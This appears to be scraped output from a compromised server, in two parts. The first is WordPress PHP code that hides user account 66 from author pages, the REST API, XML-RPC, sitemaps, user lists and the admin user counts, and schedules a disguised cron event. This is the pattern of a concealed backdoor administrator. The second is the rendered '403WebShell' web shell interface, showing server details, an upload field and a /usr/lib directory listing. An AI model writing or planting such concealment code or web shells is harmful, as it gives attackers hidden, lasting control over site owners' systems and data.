add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / usr /lib / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
August 27 2024 14:19:31
root / root
0755
X11
--
April 08 2024 16:23:20
root / root
0755
aarch64-linux-gnu
--
July 28 2026 04:17:54
root / root
0755
apache2
--
November 06 2024 08:35:21
root / root
0755
apparmor
--
June 14 2026 05:35:06
root / root
0755
apt
--
July 13 2025 09:25:06
root / root
0755
bfd-plugins
--
July 13 2025 14:00:17
root / root
0755
binfmt.d
--
July 08 2026 04:38:32
root / root
0755
byobu
--
August 27 2024 14:31:44
root / root
0755
cgi-bin
--
August 31 2025 16:22:40
root / root
0755
cloud-init
--
June 14 2026 05:35:08
root / root
0755
compat-ld
--
April 01 2026 16:21:53
root / root
0755
console-setup
--
August 27 2024 14:24:42
root / root
0755
cryptsetup
--
March 10 2025 05:49:23
root / root
0755
dbus-1.0
--
August 27 2024 14:24:49
root / root
0755
dhcpcd
--
December 17 2025 07:11:21
root / root
0755
dpkg
--
August 27 2024 14:19:39
root / root
0755
dracut
--
June 14 2026 05:35:07
root / root
0755
environment.d
--
July 23 2026 04:34:41
root / root
0755
file
--
August 27 2024 14:31:44
root / root
0755
finalrd
--
August 27 2024 14:24:54
root / root
0755
firmware
--
July 18 2026 04:53:52
root / root
0755
gcc
--
July 13 2025 14:00:16
root / root
0755
girepository-1.0
--
April 25 2026 04:25:15
root / root
0755
git-core
--
July 10 2025 06:24:52
root / root
0755
gnupg
--
January 09 2026 06:00:20
root / root
0755
gnupg2
--
January 09 2026 06:00:20
root / root
0755
gold-ld
--
April 01 2026 16:21:53
root / root
0755
groff
--
August 27 2024 14:24:51
root / root
0755
grub
--
May 26 2025 14:47:10
root / root
0755
hdparm
--
August 27 2024 14:31:44
root / root
0755
init
--
August 27 2024 14:24:06
root / root
0755
initcpio
--
August 27 2024 14:24:53
root / root
0755
initramfs-tools
--
August 27 2024 14:24:53
root / root
0755
kernel
--
June 11 2026 05:00:01
root / root
0755
klibc
--
August 27 2024 14:24:53
root / root
0755
linux
--
October 09 2024 06:24:45
root / root
0755
locale
--
July 28 2026 04:17:58
root / root
0755
lsb
--
August 27 2024 14:24:06
root / root
0755
man-db
--
August 27 2024 14:31:44
root / root
0755
mecab
--
November 06 2024 08:35:25
root / root
0755
mime
--
February 04 2024 18:05:15
root / root
0755
modprobe.d
--
July 18 2026 04:53:52
root / root
0755
modules
--
July 18 2026 21:02:18
root / root
0000
modules-load.d
--
June 27 2026 06:07:31
root / root
0755
multipath
--
June 27 2026 06:07:31
root / root
0755
mysql
--
June 25 2026 04:43:28
root / root
0755
nagios
--
August 27 2024 14:24:57
root / root
0755
needrestart
--
December 06 2024 06:41:24
root / root
0755
netplan
--
April 04 2026 06:44:48
root / root
0755
networkd-dispatcher
--
August 27 2024 14:24:50
root / root
0755
node_modules
--
June 25 2026 04:55:28
root / root
0755
nvidia
--
April 13 2026 08:32:59
root / root
0755
open-iscsi
--
July 13 2025 09:25:09
root / root
0755
openssh
--
July 14 2026 06:28:50
root / root
0755
pam.d
--
June 11 2026 05:00:01
root / root
0755
pcrlock.d
--
June 11 2026 05:00:01
root / root
0755
php
--
July 04 2026 06:05:01
root / root
0755
pm-utils
--
August 27 2024 14:31:44
root / root
0755
policykit-1
--
April 15 2026 04:49:34
root / root
0755
polkit-1
--
April 15 2026 04:49:34
root / root
0755
postfix
--
May 09 2026 04:43:29
root / root
0755
postgresql
--
March 22 2026 09:42:56
root / root
0755
python3
--
August 27 2024 14:24:44
root / root
0755
python3.12
--
July 08 2026 04:38:33
root / root
0755
recovery-mode
--
August 27 2024 14:31:45
root / root
0755
rsyslog
--
July 25 2026 04:34:26
root / root
0755
sasl2
--
August 09 2024 02:33:21
root / root
0755
shim
--
October 09 2024 06:19:45
root / root
0755
snapd
--
July 23 2026 04:34:41
root / root
0755
software-properties
--
March 16 2026 12:04:21
root / root
0755
ssl
--
June 11 2026 05:03:01
root / root
0755
sysctl.d
--
June 14 2026 05:35:06
root / root
0755
sysstat
--
August 27 2024 14:31:45
root / root
0755
systemd
--
June 11 2026 05:00:01
root / root
0755
sysusers.d
--
June 11 2026 05:00:01
root / root
0755
tmpfiles.d
--
July 25 2026 04:34:26
root / root
0755
ubiquity
--
August 27 2024 14:24:48
root / root
0755
ubuntu-advantage
--
July 17 2026 04:54:38
root / root
0755
ubuntu-release-upgrader
--
February 04 2026 07:35:55
root / root
0755
udev
--
July 23 2026 04:34:41
root / root
0755
ufw
--
August 27 2024 14:31:45
root / root
0755
update-notifier
--
July 13 2025 09:25:11
root / root
0755
valgrind
--
November 14 2025 05:53:08
root / root
0755
cnf-update-db
1.05 KB
August 27 2024 14:31:44
root / root
0755
command-not-found
3.481 KB
August 27 2024 14:31:44
root / root
0755
cpp
966.836 KB
December 18 2025 20:59:51
root / root
0755
klibc-s19HqNAwMyOy4ALgXfqJhbGlmRU.so
128.945 KB
January 12 2026 02:55:06
root / root
0755
ld-linux-aarch64.so.1
199.188 KB
July 23 2026 17:18:13
root / root
0755
libadns.so.1
130.359 KB
March 31 2024 17:35:47
root / root
0644
libadns.so.1.6
130.359 KB
March 31 2024 17:35:47
root / root
0644
libc-client.so.2007e
1.09 MB
April 01 2024 05:20:36
root / root
0644
libc-client.so.2007e.0
1.09 MB
April 01 2024 05:20:36
root / root
0644
libmpathcmd.so.0
66.008 KB
June 04 2026 10:26:17
root / root
0644
libmpathpersist.so.0
66.008 KB
June 04 2026 10:26:17
root / root
0644
libmpathutil.so.0
66.016 KB
June 04 2026 10:26:17
root / root
0644
libmultipath.so.0
413.328 KB
June 04 2026 10:26:17
root / root
0644
os-release
0.391 KB
February 06 2026 07:23:01
root / root
0644
sendmail
66.219 KB
May 05 2026 15:47:29
root / root
0755
sftp-server
130.055 KB
July 09 2026 18:16:38
root / root
0755
Youez - 2016 - github.com/yon3zuLinuXploit